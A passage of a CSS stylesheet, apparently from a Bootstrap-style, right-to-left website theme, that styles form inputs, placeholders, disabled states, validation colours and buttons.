input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select::-ms-expand,
textarea::-ms-expand,
input[type="text"]::-ms-expand,
input[type="password"]::-ms-expand,
input[type="datetime"]::-ms-expand,
input[type="datetime-local"]::-ms-expand,
input[type="date"]::-ms-expand,
input[type="month"]::-ms-expand,
input[type="time"]::-ms-expand,
input[type="week"]::-ms-expand,
input[type="number"]::-ms-expand,
input[type="email"]::-ms-expand,
input[type="url"]::-ms-expand,
input[type="search"]::-ms-expand,
input[type="tel"]::-ms-expand,
input[type="color"]::-ms-expand,
.inputbox::-ms-expand {
  background-color: transparent;
  border: 0;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-left: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: right;
    width: 160px;
    padding-top: 5px;
    text-align: left;
  }
}
.form-horizontal .control-group .controls {
  margin-right: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-right: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-right: 0;
  vertical-align: top;
  border-radius: 0 0 0 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-left: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0 0 0 0;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0 0 0 0;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0 0 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-right: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-left: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-right: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-right: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: 700;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  -webkit-appearance: none;
  appearance: none;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control::-ms-expand {
  background-color: transparent;
  border: 0;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"].form-control,
  input[type="time"].form-control,
  input[type="datetime-local"].form-control,
  input[type="month"].form-control {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-right: 20px;
  margin-bottom: 0;
  font-weight: 400;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-top: 4px \9;
  margin-right: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-right: 20px;
  margin-bottom: 0;
  font-weight: 400;
  vertical-align: middle;
  cursor: pointer;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-right: 10px;
}
.form-control-static {
  min-height: 34px;
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-left: 0;
  padding-right: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.form-group-sm select.form-control {
  height: 30px;
  line-height: 30px;
}
.form-group-sm textarea.form-control,
.form-group-sm select[multiple].form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  min-height: 32px;
  padding: 6px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.form-group-lg select.form-control {
  height: 45px;
  line-height: 45px;
}
.form-group-lg textarea.form-control,
.form-group-lg select[multiple].form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  min-height: 38px;
  padding: 11px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-left: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback,
.input-group-lg + .form-control-feedback,
.form-group-lg .form-control + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback,
.input-group-sm + .form-control-feedback,
.form-group-sm .form-control + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  background-color: #dff0d8;
  border-color: #468847;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #c09853;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #b94a48;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-right: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-right: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  padding-top: 7px;
  margin-top: 0;
  margin-bottom: 0;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-left: -20px;
  margin-right: -20px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    padding-top: 7px;
    margin-bottom: 0;
    text-align: left;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  left: 20px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 11px;
    font-size: 18px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
    font-size: 12px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  filter: alpha(opacity=65);
  opacity: 0.65;
  -webkit-box-shadow: none;
  box-shadow: none;
}
a.btn.disabled,
fieldset[disabled] a.btn {
  pointer-events: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:focus,
.btn-default.focus {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #8c8c8c;
}
.btn-default:hover {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  background-image: none;
  border-color: #adadad;
}
.btn-default:active:hover,
.btn-default.active:hover,
.open > .dropdown-toggle.btn-default:hover,
.btn-default:active:focus,
.btn-default.active:focus,
.open > .dropdown-toggle.btn-default:focus,
.btn-default:active.focus,
.btn-default.active.focus,
.open > .dropdown-toggle.btn-default.focus {
  color: #333333;
  background-color: #d4d4d4;
  border-color: #8c8c8c;
}
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-primary:focus,
.btn-primary.focus {
  color: #ffffff;
  background-color: #990000;
  border-color: #330000;
}
.btn-primary:hover {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #990000;
  background-image: none;
  border-color: #750000;
}
.btn-primary:active:hover,
.btn-primary.active:hover,
.open > .dropdown-toggle.btn-primary:hover,
.btn-primary:active:focus,
.btn-primary.active:focus,
.open > .dropdown-toggle.btn-primary:focus,
.btn-primary:active.focus,
.btn-primary.active.focus,
.open > .dropdown-toggle.btn-primary.focus {
  color: #ffffff;
  background-color: #750000;
  border-color: #330000;
}
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-primary .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:focus,
.btn-success.focus {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #122e18;
}
.btn-success:hover {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  background-image: none;
  border-color: #255d31;
}
.btn-success:active:hover,
.btn-success.active:hover,
.open > .dropdown-toggle.btn-success:hover,
.btn-success:active:focus,
.btn-success.active:focus,
.open > .dropdown-toggle.btn-success:focus,
.btn-success:active.focus,
.btn-success.active.focus,
.open > .dropdown-toggle.btn-success.focus {
  color: #ffffff;
  background-color: #255d31;
  border-color: #122e18;
}
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
